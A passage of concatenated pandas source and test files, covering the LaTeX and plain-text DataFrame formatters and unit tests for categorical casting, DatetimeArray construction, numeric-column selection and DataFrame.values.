for j in range(self.index_levels):
if row[j].strip():
nrow = 1
for r in self.strrows[i + 1 :]:
if not r[j].strip():
nrow += 1
else:
break
if nrow > 1:
# overwrite non-multirow entry
row[j] = f"\\multirow{{{nrow:d}}}{{*}}{{{row[j].strip()}}}"
# save when to end the current block with \cline
self.clinebuf.append([i + nrow - 1, j + 1])
return row
def _compose_cline(self, i: int, icol: int) -> str:
"""
Create clines after multirow-blocks are finished.
"""
lst = []
for cl in self.clinebuf:
if cl[0] == i:
lst.append(f"\n\\cline{{{cl[1]:d}-{icol:d}}}")
# remove entries that have been written to buffer
self.clinebuf = [x for x in self.clinebuf if x[0] != i]
return "".join(lst)
class RowStringIterator(RowStringConverter):
"""Iterator over rows of the header or the body of the table."""
@abstractmethod
def __iter__(self) -> Iterator[str]:
"""Iterate over LaTeX string representations of rows."""
class RowHeaderIterator(RowStringIterator):
"""Iterator for the table header rows."""
def __iter__(self) -> Iterator[str]:
for row_num in range(len(self.strrows)):
if row_num < self._header_row_num:
yield self.get_strrow(row_num)
class RowBodyIterator(RowStringIterator):
"""Iterator for the table body rows."""
def __iter__(self) -> Iterator[str]:
for row_num in range(len(self.strrows)):
if row_num >= self._header_row_num:
yield self.get_strrow(row_num)
class TableBuilderAbstract(ABC):
"""
Abstract table builder producing string representation of LaTeX table.
Parameters
----------
formatter : `DataFrameFormatter`
Instance of `DataFrameFormatter`.
column_format: str, optional
Column format, for example, 'rcl' for three columns.
multicolumn: bool, optional
Use multicolumn to enhance MultiIndex columns.
multicolumn_format: str, optional
The alignment for multicolumns, similar to column_format.
multirow: bool, optional
Use multirow to enhance MultiIndex rows.
caption: str, optional
Table caption.
short_caption: str, optional
Table short caption.
label: str, optional
LaTeX label.
position: str, optional
Float placement specifier, for example, 'htb'.
"""
def __init__(
self,
formatter: DataFrameFormatter,
column_format: str | None = None,
multicolumn: bool = False,
multicolumn_format: str | None = None,
multirow: bool = False,
caption: str | None = None,
short_caption: str | None = None,
label: str | None = None,
position: str | None = None,
):
self.fmt = formatter
self.column_format = column_format
self.multicolumn = multicolumn
self.multicolumn_format = multicolumn_format
self.multirow = multirow
self.caption = caption
self.short_caption = short_caption
self.label = label
self.position = position
def get_result(self) -> str:
"""String representation of LaTeX table."""
elements = [
self.env_begin,
self.top_separator,
self.header,
self.middle_separator,
self.env_body,
self.bottom_separator,
self.env_end,
]
result = "\n".join([item for item in elements if item])
trailing_newline = "\n"
result += trailing_newline
return result
@property
@abstractmethod
def env_begin(self) -> str:
"""Beginning of the environment."""
@property
@abstractmethod
def top_separator(self) -> str:
"""Top level separator."""
@property
@abstractmethod
def header(self) -> str:
"""Header lines."""
@property
@abstractmethod
def middle_separator(self) -> str:
"""Middle level separator."""
@property
@abstractmethod
def env_body(self) -> str:
"""Environment body."""
@property
@abstractmethod
def bottom_separator(self) -> str:
"""Bottom level separator."""
@property
@abstractmethod
def env_end(self) -> str:
"""End of the environment."""
class GenericTableBuilder(TableBuilderAbstract):
"""Table builder producing string representation of LaTeX table."""
@property
def header(self) -> str:
iterator = self._create_row_iterator(over="header")
return "\n".join(list(iterator))
@property
def top_separator(self) -> str:
return "\\toprule"
@property
def middle_separator(self) -> str:
return "\\midrule" if self._is_separator_required() else ""
@property
def env_body(self) -> str:
iterator = self._create_row_iterator(over="body")
return "\n".join(list(iterator))
def _is_separator_required(self) -> bool:
return bool(self.header and self.env_body)
@property
def _position_macro(self) -> str:
r"""Position macro, extracted from self.position, like [h]."""
return f"[{self.position}]" if self.position else ""
@property
def _caption_macro(self) -> str:
r"""Caption macro, extracted from self.caption.
With short caption:
\caption[short_caption]{caption_string}.
Without short caption:
\caption{caption_string}.
"""
if self.caption:
return "".join(
[
r"\caption",
f"[{self.short_caption}]" if self.short_caption else "",
f"{{{self.caption}}}",
]
)
return ""
@property
def _label_macro(self) -> str:
r"""Label macro, extracted from self.label, like \label{ref}."""
return f"\\label{{{self.label}}}" if self.label else ""
def _create_row_iterator(self, over: str) -> RowStringIterator:
"""Create iterator over header or body of the table.
Parameters
----------
over : {'body', 'header'}
Over what to iterate.
Returns
-------
RowStringIterator
Iterator over body or header.
"""
iterator_kind = self._select_iterator(over)
return iterator_kind(
formatter=self.fmt,
multicolumn=self.multicolumn,
multicolumn_format=self.multicolumn_format,
multirow=self.multirow,
)
def _select_iterator(self, over: str) -> type[RowStringIterator]:
"""Select proper iterator over table rows."""
if over == "header":
return RowHeaderIterator
elif over == "body":
return RowBodyIterator
else:
msg = f"'over' must be either 'header' or 'body', but {over} was provided"
raise ValueError(msg)
class LongTableBuilder(GenericTableBuilder):
"""Concrete table builder for longtable.
>>> from pandas.io.formats import format as fmt
>>> df = pd.DataFrame({"a": [1, 2], "b": ["b1", "b2"]})
>>> formatter = fmt.DataFrameFormatter(df)
>>> builder = LongTableBuilder(formatter, caption='a long table',
... label='tab:long', column_format='lrl')
>>> table = builder.get_result()
>>> print(table)
\\begin{longtable}{lrl}
\\caption{a long table}
\\label{tab:long}\\\\
\\toprule
{} & a & b \\\\
\\midrule
\\endfirsthead
\\caption[]{a long table} \\\\
\\toprule
{} & a & b \\\\
\\midrule
\\endhead
\\midrule
\\multicolumn{3}{r}{{Continued on next page}} \\\\
\\midrule
\\endfoot
<BLANKLINE>
\\bottomrule
\\endlastfoot
0 & 1 & b1 \\\\
1 & 2 & b2 \\\\
\\end{longtable}
<BLANKLINE>
"""
@property
def env_begin(self) -> str:
first_row = (
f"\\begin{{longtable}}{self._position_macro}{{{self.column_format}}}"
)
elements = [first_row, f"{self._caption_and_label()}"]
return "\n".join([item for item in elements if item])
def _caption_and_label(self) -> str:
if self.caption or self.label:
double_backslash = "\\\\"
elements = [f"{self._caption_macro}", f"{self._label_macro}"]
caption_and_label = "\n".join([item for item in elements if item])
caption_and_label += double_backslash
return caption_and_label
else:
return ""
@property
def middle_separator(self) -> str:
iterator = self._create_row_iterator(over="header")
# the content between \endfirsthead and \endhead commands
# mitigates repeated List of Tables entries in the final LaTeX
# document when dealing with longtable environments; GH #34360
elements = [
"\\midrule",
"\\endfirsthead",
f"\\caption[]{{{self.caption}}} \\\\" if self.caption else "",
self.top_separator,
self.header,
"\\midrule",
"\\endhead",
"\\midrule",
f"\\multicolumn{{{len(iterator.strcols)}}}{{r}}"
"{{Continued on next page}} \\\\",
"\\midrule",
"\\endfoot\n",
"\\bottomrule",
"\\endlastfoot",
]
if self._is_separator_required():
return "\n".join(elements)
return ""
@property
def bottom_separator(self) -> str:
return ""
@property
def env_end(self) -> str:
return "\\end{longtable}"
class RegularTableBuilder(GenericTableBuilder):
"""Concrete table builder for regular table.
>>> from pandas.io.formats import format as fmt
>>> df = pd.DataFrame({"a": [1, 2], "b": ["b1", "b2"]})
>>> formatter = fmt.DataFrameFormatter(df)
>>> builder = RegularTableBuilder(formatter, caption='caption', label='lab',
... column_format='lrc')
>>> table = builder.get_result()
>>> print(table)
\\begin{table}
\\centering
\\caption{caption}
\\label{lab}
\\begin{tabular}{lrc}
\\toprule
{} & a & b \\\\
\\midrule
0 & 1 & b1 \\\\
1 & 2 & b2 \\\\
\\bottomrule
\\end{tabular}
\\end{table}
<BLANKLINE>
"""
@property
def env_begin(self) -> str:
elements = [
f"\\begin{{table}}{self._position_macro}",
"\\centering",
f"{self._caption_macro}",
f"{self._label_macro}",
f"\\begin{{tabular}}{{{self.column_format}}}",
]
return "\n".join([item for item in elements if item])
@property
def bottom_separator(self) -> str:
return "\\bottomrule"
@property
def env_end(self) -> str:
return "\n".join(["\\end{tabular}", "\\end{table}"])
class TabularBuilder(GenericTableBuilder):
"""Concrete table builder for tabular environment.
>>> from pandas.io.formats import format as fmt
>>> df = pd.DataFrame({"a": [1, 2], "b": ["b1", "b2"]})
>>> formatter = fmt.DataFrameFormatter(df)
>>> builder = TabularBuilder(formatter, column_format='lrc')
>>> table = builder.get_result()
>>> print(table)
\\begin{tabular}{lrc}
\\toprule
{} & a & b \\\\
\\midrule
0 & 1 & b1 \\\\
1 & 2 & b2 \\\\
\\bottomrule
\\end{tabular}
<BLANKLINE>
"""
@property
def env_begin(self) -> str:
return f"\\begin{{tabular}}{{{self.column_format}}}"
@property
def bottom_separator(self) -> str:
return "\\bottomrule"
@property
def env_end(self) -> str:
return "\\end{tabular}"
class LatexFormatter:
r"""
Used to render a DataFrame to a LaTeX tabular/longtable environment output.
Parameters
----------
formatter : `DataFrameFormatter`
longtable : bool, default False
Use longtable environment.
column_format : str, default None
The columns format as specified in `LaTeX table format
<https://en.wikibooks.org/wiki/LaTeX/Tables>`__ e.g 'rcl' for 3 columns
multicolumn : bool, default False
Use \multicolumn to enhance MultiIndex columns.
multicolumn_format : str, default 'l'
The alignment for multicolumns, similar to `column_format`
multirow : bool, default False
Use \multirow to enhance MultiIndex rows.
caption : str or tuple, optional
Tuple (full_caption, short_caption),
which results in \caption[short_caption]{full_caption};
if a single string is passed, no short caption will be set.
label : str, optional
The LaTeX label to be placed inside ``\label{}`` in the output.
position : str, optional
The LaTeX positional argument for tables, to be placed after
``\begin{}`` in the output.
See Also
--------
HTMLFormatter
"""
def __init__(
self,
formatter: DataFrameFormatter,
longtable: bool = False,
column_format: str | None = None,
multicolumn: bool = False,
multicolumn_format: str | None = None,
multirow: bool = False,
caption: str | tuple[str, str] | None = None,
label: str | None = None,
position: str | None = None,
):
self.fmt = formatter
self.frame = self.fmt.frame
self.longtable = longtable
self.column_format = column_format
self.multicolumn = multicolumn
self.multicolumn_format = multicolumn_format
self.multirow = multirow
self.caption, self.short_caption = _split_into_full_short_caption(caption)
self.label = label
self.position = position
def to_string(self) -> str:
"""
Render a DataFrame to a LaTeX tabular, longtable, or table/tabular
environment output.
"""
return self.builder.get_result()
@property
def builder(self) -> TableBuilderAbstract:
"""Concrete table builder.
Returns
-------
TableBuilder
"""
builder = self._select_builder()
return builder(
formatter=self.fmt,
column_format=self.column_format,
multicolumn=self.multicolumn,
multicolumn_format=self.multicolumn_format,
multirow=self.multirow,
caption=self.caption,
short_caption=self.short_caption,
label=self.label,
position=self.position,
)
def _select_builder(self) -> type[TableBuilderAbstract]:
"""Select proper table builder."""
if self.longtable:
return LongTableBuilder
if any([self.caption, self.label, self.position]):
return RegularTableBuilder
return TabularBuilder
@property
def column_format(self) -> str | None:
"""Column format."""
return self._column_format
@column_format.setter
def column_format(self, input_column_format: str | None) -> None:
"""Setter for column format."""
if input_column_format is None:
self._column_format = (
self._get_index_format() + self._get_column_format_based_on_dtypes()
)
elif not isinstance(input_column_format, str):
raise ValueError(
f"column_format must be str or unicode, "
f"not {type(input_column_format)}"
)
else:
self._column_format = input_column_format
def _get_column_format_based_on_dtypes(self) -> str:
"""Get column format based on data type.
Right alignment for numbers and left - for strings.
"""
def get_col_type(dtype):
if issubclass(dtype.type, np.number):
return "r"
return "l"
dtypes = self.frame.dtypes._values
return "".join(map(get_col_type, dtypes))
def _get_index_format(self) -> str:
"""Get index column format."""
return "l" * self.frame.index.nlevels if self.fmt.index else ""
def _escape_symbols(row: Sequence[str]) -> list[str]:
"""Carry out string replacements for special symbols.
Parameters
----------
row : list
List of string, that may contain special symbols.
Returns
-------
list
list of strings with the special symbols replaced.
"""
return [
(
x.replace("\\", "\\textbackslash ")
.replace("_", "\\_")
.replace("%", "\\%")
.replace("$", "\\$")
.replace("#", "\\#")
.replace("{", "\\{")
.replace("}", "\\}")
.replace("~", "\\textasciitilde ")
.replace("^", "\\textasciicircum ")
.replace("&", "\\&")
if (x and x != "{}")
else "{}"
)
for x in row
]
def _convert_to_bold(crow: Sequence[str], ilevels: int) -> list[str]:
"""Convert elements in ``crow`` to bold."""
return [
f"\\textbf{{{x}}}" if j < ilevels and x.strip() not in ["", "{}"] else x
for j, x in enumerate(crow)
]
if __name__ == "__main__":
import doctest
doctest.testmod()
```
#### File: io/formats/string.py
```python
from __future__ import annotations
from shutil import get_terminal_size
from typing import Iterable
import numpy as np
from pandas.io.formats.format import DataFrameFormatter
from pandas.io.formats.printing import pprint_thing
class StringFormatter:
"""Formatter for string representation of a dataframe."""
def __init__(self, fmt: DataFrameFormatter, line_width: int | None = None):
self.fmt = fmt
self.adj = fmt.adj
self.frame = fmt.frame
self.line_width = line_width
def to_string(self) -> str:
text = self._get_string_representation()
if self.fmt.should_show_dimensions:
text = "".join([text, self.fmt.dimensions_info])
return text
def _get_strcols(self) -> list[list[str]]:
strcols = self.fmt.get_strcols()
if self.fmt.is_truncated:
strcols = self._insert_dot_separators(strcols)
return strcols
def _get_string_representation(self) -> str:
if self.fmt.frame.empty:
return self._empty_info_line
strcols = self._get_strcols()
if self.line_width is None:
# no need to wrap around just print the whole frame
return self.adj.adjoin(1, *strcols)
if self._need_to_wrap_around:
return self._join_multiline(strcols)
return self._fit_strcols_to_terminal_width(strcols)
@property
def _empty_info_line(self) -> str:
return (
f"Empty {type(self.frame).__name__}\n"
f"Columns: {pprint_thing(self.frame.columns)}\n"
f"Index: {pprint_thing(self.frame.index)}"
)
@property
def _need_to_wrap_around(self) -> bool:
return bool(self.fmt.max_cols is None or self.fmt.max_cols > 0)
def _insert_dot_separators(self, strcols: list[list[str]]) -> list[list[str]]:
str_index = self.fmt._get_formatted_index(self.fmt.tr_frame)
index_length = len(str_index)
if self.fmt.is_truncated_horizontally:
strcols = self._insert_dot_separator_horizontal(strcols, index_length)
if self.fmt.is_truncated_vertically:
strcols = self._insert_dot_separator_vertical(strcols, index_length)
return strcols
@property
def _adjusted_tr_col_num(self) -> int:
return self.fmt.tr_col_num + 1 if self.fmt.index else self.fmt.tr_col_num
def _insert_dot_separator_horizontal(
self, strcols: list[list[str]], index_length: int
) -> list[list[str]]:
strcols.insert(self._adjusted_tr_col_num, [" ..."] * index_length)
return strcols
def _insert_dot_separator_vertical(
self, strcols: list[list[str]], index_length: int
) -> list[list[str]]:
n_header_rows = index_length - len(self.fmt.tr_frame)
row_num = self.fmt.tr_row_num
for ix, col in enumerate(strcols):
cwidth = self.adj.len(col[row_num])
if self.fmt.is_truncated_horizontally:
is_dot_col = ix == self._adjusted_tr_col_num
else:
is_dot_col = False
if cwidth > 3 or is_dot_col:
dots = "..."
else:
dots = ".."
if ix == 0 and self.fmt.index:
dot_mode = "left"
elif is_dot_col:
cwidth = 4
dot_mode = "right"
else:
dot_mode = "right"
dot_str = self.adj.justify([dots], cwidth, mode=dot_mode)[0]
col.insert(row_num + n_header_rows, dot_str)
return strcols
def _join_multiline(self, strcols_input: Iterable[list[str]]) -> str:
lwidth = self.line_width
adjoin_width = 1
strcols = list(strcols_input)
if self.fmt.index:
idx = strcols.pop(0)
lwidth -= np.array([self.adj.len(x) for x in idx]).max() + adjoin_width
col_widths = [
np.array([self.adj.len(x) for x in col]).max() if len(col) > 0 else 0
for col in strcols
]
assert lwidth is not None
col_bins = _binify(col_widths, lwidth)
nbins = len(col_bins)
if self.fmt.is_truncated_vertically:
assert self.fmt.max_rows_fitted is not None
nrows = self.fmt.max_rows_fitted + 1
else:
nrows = len(self.frame)
str_lst = []
start = 0
for i, end in enumerate(col_bins):
row = strcols[start:end]
if self.fmt.index:
row.insert(0, idx)
if nbins > 1:
if end <= len(strcols) and i < nbins - 1:
row.append([" \\"] + [" "] * (nrows - 1))
else:
row.append([" "] * nrows)
str_lst.append(self.adj.adjoin(adjoin_width, *row))
start = end
return "\n\n".join(str_lst)
def _fit_strcols_to_terminal_width(self, strcols: list[list[str]]) -> str:
from pandas import Series
lines = self.adj.adjoin(1, *strcols).split("\n")
max_len = Series(lines).str.len().max()
# plus truncate dot col
width, _ = get_terminal_size()
dif = max_len - width
# '+ 1' to avoid too wide repr (GH PR #17023)
adj_dif = dif + 1
col_lens = Series([Series(ele).apply(len).max() for ele in strcols])
n_cols = len(col_lens)
counter = 0
while adj_dif > 0 and n_cols > 1:
counter += 1
mid = round(n_cols / 2)
mid_ix = col_lens.index[mid]
col_len = col_lens[mid_ix]
# adjoin adds one
adj_dif -= col_len + 1
col_lens = col_lens.drop(mid_ix)
n_cols = len(col_lens)
# subtract index column
max_cols_fitted = n_cols - self.fmt.index
# GH-21180. Ensure that we print at least two.
max_cols_fitted = max(max_cols_fitted, 2)
self.fmt.max_cols_fitted = max_cols_fitted
# Call again _truncate to cut frame appropriately
# and then generate string representation
self.fmt.truncate()
strcols = self._get_strcols()
return self.adj.adjoin(1, *strcols)
def _binify(cols: list[int], line_width: int) -> list[int]:
adjoin_width = 1
bins = []
curr_width = 0
i_last_column = len(cols) - 1
for i, w in enumerate(cols):
w_adjoined = w + adjoin_width
curr_width += w_adjoined
if i_last_column == i:
wrap = curr_width + 1 > line_width and i > 0
else:
wrap = curr_width + 2 > line_width and i > 0
if wrap:
bins.append(i)
curr_width = w_adjoined
bins.append(len(cols))
return bins
```
#### File: arrays/categorical/test_astype.py
```python
import numpy as np
import pytest
from pandas import (
Categorical,
CategoricalDtype,
NaT,
Timestamp,
array,
to_datetime,
)
import pandas._testing as tm
class TestAstype:
def test_astype_str_int_categories_to_nullable_int(self):
# GH#39616
dtype = CategoricalDtype([str(i) for i in range(5)])
codes = np.random.randint(5, size=20)
arr = Categorical.from_codes(codes, dtype=dtype)
res = arr.astype("Int64")
expected = array(codes, dtype="Int64")
tm.assert_extension_array_equal(res, expected)
@pytest.mark.parametrize("ordered", [True, False])
def test_astype(self, ordered):
# string
cat = Categorical(list("abbaaccc"), ordered=ordered)
result = cat.astype(object)
expected = np.array(cat)
tm.assert_numpy_array_equal(result, expected)
msg = r"Cannot cast object dtype to float64"
with pytest.raises(ValueError, match=msg):
cat.astype(float)
# numeric
cat = Categorical([0, 1, 2, 2, 1, 0, 1, 0, 2], ordered=ordered)
result = cat.astype(object)
expected = np.array(cat, dtype=object)
tm.assert_numpy_array_equal(result, expected)
result = cat.astype(int)
expected = np.array(cat, dtype="int")
tm.assert_numpy_array_equal(result, expected)
result = cat.astype(float)
expected = np.array(cat, dtype=float)
tm.assert_numpy_array_equal(result, expected)
@pytest.mark.parametrize("dtype_ordered", [True, False])
@pytest.mark.parametrize("cat_ordered", [True, False])
def test_astype_category(self, dtype_ordered, cat_ordered):
# GH#10696/GH#18593
data = list("abcaacbab")
cat = Categorical(data, categories=list("bac"), ordered=cat_ordered)
# standard categories
dtype = CategoricalDtype(ordered=dtype_ordered)
result = cat.astype(dtype)
expected = Categorical(data, categories=cat.categories, ordered=dtype_ordered)
tm.assert_categorical_equal(result, expected)
# non-standard categories
dtype = CategoricalDtype(list("adc"), dtype_ordered)
result = cat.astype(dtype)
expected = Categorical(data, dtype=dtype)
tm.assert_categorical_equal(result, expected)
if dtype_ordered is False:
# dtype='category' can't specify ordered, so only test once
result = cat.astype("category")
expected = cat
tm.assert_categorical_equal(result, expected)
def test_astype_object_datetime_categories(self):
# GH#40754
cat = Categorical(to_datetime(["2021-03-27", NaT]))
result = cat.astype(object)
expected = np.array([Timestamp("2021-03-27 00:00:00"), NaT], dtype="object")
tm.assert_numpy_array_equal(result, expected)
def test_astype_object_timestamp_categories(self):
# GH#18024
cat = Categorical([Timestamp("2014-01-01")])
result = cat.astype(object)
expected = np.array([Timestamp("2014-01-01 00:00:00")], dtype="object")
tm.assert_numpy_array_equal(result, expected)
```
#### File: arrays/datetimes/test_constructors.py
```python
import numpy as np
import pytest
from pandas.core.dtypes.dtypes import DatetimeTZDtype
import pandas as pd
import pandas._testing as tm
from pandas.core.arrays import DatetimeArray
from pandas.core.arrays.datetimes import _sequence_to_dt64ns
class TestDatetimeArrayConstructor:
def test_from_sequence_invalid_type(self):
mi = pd.MultiIndex.from_product([np.arange(5), np.arange(5)])
with pytest.raises(TypeError, match="Cannot create a DatetimeArray"):
DatetimeArray._from_sequence(mi)
def test_only_1dim_accepted(self):
arr = np.array([0, 1, 2, 3], dtype="M8[h]").astype("M8[ns]")
with pytest.raises(ValueError, match="Only 1-dimensional"):
# 3-dim, we allow 2D to sneak in for ops purposes GH#29853
DatetimeArray(arr.reshape(2, 2, 1))
with pytest.raises(ValueError, match="Only 1-dimensional"):
# 0-dim
DatetimeArray(arr[[0]].squeeze())
def test_freq_validation(self):
# GH#24623 check that invalid instances cannot be created with the
# public constructor
arr = np.arange(5, dtype=np.int64) * 3600 * 10**9
msg = (
"Inferred frequency H from passed values does not "
"conform to passed frequency W-SUN"
)
with pytest.raises(ValueError, match=msg):
DatetimeArray(arr, freq="W")
@pytest.mark.parametrize(
"meth",
[
DatetimeArray._from_sequence,
_sequence_to_dt64ns,
pd.to_datetime,
pd.DatetimeIndex,
],
)
def test_mixing_naive_tzaware_raises(self, meth):
# GH#24569
arr = np.array([pd.Timestamp("2000"), pd.Timestamp("2000", tz="CET")])
msg = (
"Cannot mix tz-aware with tz-naive values|"
"Tz-aware datetime.datetime cannot be converted "
"to datetime64 unless utc=True"
)
for obj in [arr, arr[::-1]]:
# check that we raise regardless of whether naive is found
# before aware or vice-versa
with pytest.raises(ValueError, match=msg):
meth(obj)
def test_from_pandas_array(self):
arr = pd.array(np.arange(5, dtype=np.int64)) * 3600 * 10**9
result = DatetimeArray._from_sequence(arr)._with_freq("infer")
expected = pd.date_range("1970-01-01", periods=5, freq="H")._data
tm.assert_datetime_array_equal(result, expected)
def test_mismatched_timezone_raises(self):
arr = DatetimeArray(
np.array(["2000-01-01T06:00:00"], dtype="M8[ns]"),
dtype=DatetimeTZDtype(tz="US/Central"),
)
dtype = DatetimeTZDtype(tz="US/Eastern")
with pytest.raises(TypeError, match="Timezone of the array"):
DatetimeArray(arr, dtype=dtype)
def test_non_array_raises(self):
with pytest.raises(ValueError, match="list"):
DatetimeArray([1, 2, 3])
def test_bool_dtype_raises(self):
arr = np.array([1, 2, 3], dtype="bool")
with pytest.raises(
ValueError, match="The dtype of 'values' is incorrect.*bool"
):
DatetimeArray(arr)
msg = r"dtype bool cannot be converted to datetime64\[ns\]"
with pytest.raises(TypeError, match=msg):
DatetimeArray._from_sequence(arr)
with pytest.raises(TypeError, match=msg):
_sequence_to_dt64ns(arr)
with pytest.raises(TypeError, match=msg):
pd.DatetimeIndex(arr)
with pytest.raises(TypeError, match=msg):
pd.to_datetime(arr)
def test_incorrect_dtype_raises(self):
with pytest.raises(ValueError, match="Unexpected value for 'dtype'."):
DatetimeArray(np.array([1, 2, 3], dtype="i8"), dtype="category")
def test_freq_infer_raises(self):
with pytest.raises(ValueError, match="Frequency inference"):
DatetimeArray(np.array([1, 2, 3], dtype="i8"), freq="infer")
def test_copy(self):
data = np.array([1, 2, 3], dtype="M8[ns]")
arr = DatetimeArray(data, copy=False)
assert arr._data is data
arr = DatetimeArray(data, copy=True)
assert arr._data is not data
class TestSequenceToDT64NS:
def test_tz_dtype_mismatch_raises(self):
arr = DatetimeArray._from_sequence(
["2000"], dtype=DatetimeTZDtype(tz="US/Central")
)
with pytest.raises(TypeError, match="data is already tz-aware"):
_sequence_to_dt64ns(arr, dtype=DatetimeTZDtype(tz="UTC"))
def test_tz_dtype_matches(self):
arr = DatetimeArray._from_sequence(
["2000"], dtype=DatetimeTZDtype(tz="US/Central")
)
result, _, _ = _sequence_to_dt64ns(arr, dtype=DatetimeTZDtype(tz="US/Central"))
tm.assert_numpy_array_equal(arr._data, result)
@pytest.mark.parametrize("order", ["F", "C"])
def test_2d(self, order):
dti = pd.date_range("2016-01-01", periods=6, tz="US/Pacific")
arr = np.array(dti, dtype=object).reshape(3, 2)
if order == "F":
arr = arr.T
res = _sequence_to_dt64ns(arr)
expected = _sequence_to_dt64ns(arr.ravel())
tm.assert_numpy_array_equal(res[0].ravel(), expected[0])
assert res[1] == expected[1]
assert res[2] == expected[2]
res = DatetimeArray._from_sequence(arr)
expected = DatetimeArray._from_sequence(arr.ravel()).reshape(arr.shape)
tm.assert_datetime_array_equal(res, expected)
```
#### File: frame/methods/test_get_numeric_data.py
```python
import numpy as np
import pandas as pd
from pandas import (
Categorical,
DataFrame,
Index,
Series,
Timestamp,
)
import pandas._testing as tm
from pandas.core.arrays import IntervalArray
class TestGetNumericData:
def test_get_numeric_data_preserve_dtype(self):
# get the numeric data
obj = DataFrame({"A": [1, "2", 3.0]})
result = obj._get_numeric_data()
expected = DataFrame(index=[0, 1, 2], dtype=object)
tm.assert_frame_equal(result, expected)
def test_get_numeric_data(self):
datetime64name = np.dtype("M8[ns]").name
objectname = np.dtype(np.object_).name
df = DataFrame(
{"a": 1.0, "b": 2, "c": "foo", "f": Timestamp("20010102")},
index=np.arange(10),
)
result = df.dtypes
expected = Series(
[
np.dtype("float64"),
np.dtype("int64"),
np.dtype(objectname),
np.dtype(datetime64name),
],
index=["a", "b", "c", "f"],
)
tm.assert_series_equal(result, expected)
df = DataFrame(
{
"a": 1.0,
"b": 2,
"c": "foo",
"d": np.array([1.0] * 10, dtype="float32"),
"e": np.array([1] * 10, dtype="int32"),
"f": np.array([1] * 10, dtype="int16"),
"g": Timestamp("20010102"),
},
index=np.arange(10),
)
result = df._get_numeric_data()
expected = df.loc[:, ["a", "b", "d", "e", "f"]]
tm.assert_frame_equal(result, expected)
only_obj = df.loc[:, ["c", "g"]]
result = only_obj._get_numeric_data()
expected = df.loc[:, []]
tm.assert_frame_equal(result, expected)
df = DataFrame.from_dict({"a": [1, 2], "b": ["foo", "bar"], "c": [np.pi, np.e]})
result = df._get_numeric_data()
expected = DataFrame.from_dict({"a": [1, 2], "c": [np.pi, np.e]})
tm.assert_frame_equal(result, expected)
df = result.copy()
result = df._get_numeric_data()
expected = df
tm.assert_frame_equal(result, expected)
def test_get_numeric_data_mixed_dtype(self):
# numeric and object columns
df = DataFrame(
{
"a": [1, 2, 3],
"b": [True, False, True],
"c": ["foo", "bar", "baz"],
"d": [None, None, None],
"e": [3.14, 0.577, 2.773],
}
)
result = df._get_numeric_data()
tm.assert_index_equal(result.columns, Index(["a", "b", "e"]))
def test_get_numeric_data_extension_dtype(self):
# GH#22290
df = DataFrame(
{
"A": pd.array([-10, np.nan, 0, 10, 20, 30], dtype="Int64"),
"B": Categorical(list("abcabc")),
"C": pd.array([0, 1, 2, 3, np.nan, 5], dtype="UInt8"),
"D": IntervalArray.from_breaks(range(7)),
}
)
result = df._get_numeric_data()
expected = df.loc[:, ["A", "C"]]
tm.assert_frame_equal(result, expected)
```
#### File: frame/methods/test_values.py
```python
import numpy as np
import pytest
import pandas.util._test_decorators as td
from pandas import (
DataFrame,
NaT,
Series,
Timestamp,
date_range,
period_range,
)
import pandas._testing as tm
class TestDataFrameValues:
@td.skip_array_manager_invalid_test
def test_values(self, float_frame):
float_frame.values[:, 0] = 5.0
assert (float_frame.values[:, 0] == 5).all()
def test_more_values(self, float_string_frame):
values = float_string_frame.values
assert values.shape[1] == len(float_string_frame.columns)
def test_values_mixed_dtypes(self, float_frame, float_string_frame):
frame = float_frame
arr = frame.values
frame_cols = frame.columns
for i, row in enumerate(arr):
for j, value in enumerate(row):
col = frame_cols[j]
if np.isnan(value):
assert np.isnan(frame[col][i])
else:
assert value == frame[col][i]
# mixed type
arr = float_string_frame[["foo", "A"]].values
assert arr[0, 0] == "bar"
df = DataFrame({"complex": [1j, 2j, 3j], "real": [1, 2, 3]})
arr = df.values
assert arr[0, 0] == 1j
def test_values_duplicates(self):
df = DataFrame(
[[1, 2, "a", "b"], [1, 2, "a", "b"]], columns=["one", "one", "two", "two"]
)
result = df.values
expected = np.array([[1, 2, "a", "b"], [1, 2, "a", "b"]], dtype=object)
tm.assert_numpy_array_equal(result, expected)
def test_values_with_duplicate_columns(self):
df = DataFrame([[1, 2.5], [3, 4.5]], index=[1, 2], columns=["x", "x"])
result = df.values
expected = np.array([[1, 2.5], [3, 4.5]])
assert (result == expected).all().all()
@pytest.mark.parametrize("constructor", [date_range, period_range])
def test_values_casts_datetimelike_to_object(self, constructor):
series = Series(constructor("2000-01-01", periods=10, freq="D"))
expected = series.astype("object")
df = DataFrame({"a": series, "b": np.random.randn(len(series))})
result = df.values.squeeze()
assert (result[:, 0] == expected.values).all()
df = DataFrame({"a": series, "b": ["foo"] * len(series)})
result = df.values.squeeze()
assert (result[:, 0] == expected.values).all()
def test_frame_values_with_tz(self):
tz = "US/Central"
df = DataFrame({"A": date_range("2000", periods=4, tz=tz)})
result = df.values
expected = np.array(
[
[Timestamp("2000-01-01", tz=tz)],
[Timestamp("2000-01-02", tz=tz)],
[Timestamp("2000-01-03", tz=tz)],
[Timestamp("2000-01-04", tz=tz)],
]
)
tm.assert_numpy_array_equal(result, expected)
# two columns, homogeneous
df["B"] = df["A"]
result = df.values
expected = np.concatenate([expected, expected], axis=1)
tm.assert_numpy_array_equal(result, expected)
# three columns, heterogeneous
est = "US/Eastern"
df["C"] = df["A"].dt.tz_convert(est)
new = np.array(
[
[Timestamp("2000-01-01T01:00:00", tz=est)],
[Timestamp("2000-01-02T01:00:00", tz=est)],
[Timestamp("2000-01-03T01:00:00", tz=est)],
[Timestamp("2000-01-04T01:00:00", tz=est)],
]
)
expected = np.concatenate([expected, new], axis=1)
result = df.values
tm.assert_numpy_array_equal(result, expected)
def test_interleave_with_tzaware(self, timezone_frame):
# interleave with object
result = timezone_frame.assign(D="foo").values
expected = np.array(
[
[
Timestamp("2013-01-01 00:00:00"),
Timestamp("2013-01-02 00:00:00"),
Timestamp("2013-01-03 00:00:00"),
],
[
Timestamp("2013-01-01 00:00:00-0500", tz="US/Eastern"),
NaT,
Timestamp("2013-01-03 00:00:00-0500", tz="US/Eastern"),
],
[
Timestamp("2013-01-01 00:00:00+0100", tz="CET"),
NaT,
Timestamp("2013-01-03 00:00:00+0100", tz="CET"),
],
["foo", "foo", "foo"],
],
dtype=object,
).T
tm.assert_numpy_array_equal(result, expected)
# interleave with only datetime64[ns]
result = timezone_frame.values
expected = np.array(
[
[
Timestamp("2013-01-01 00:00:00"),
Timestamp("2013-01-02 00:00:00"),
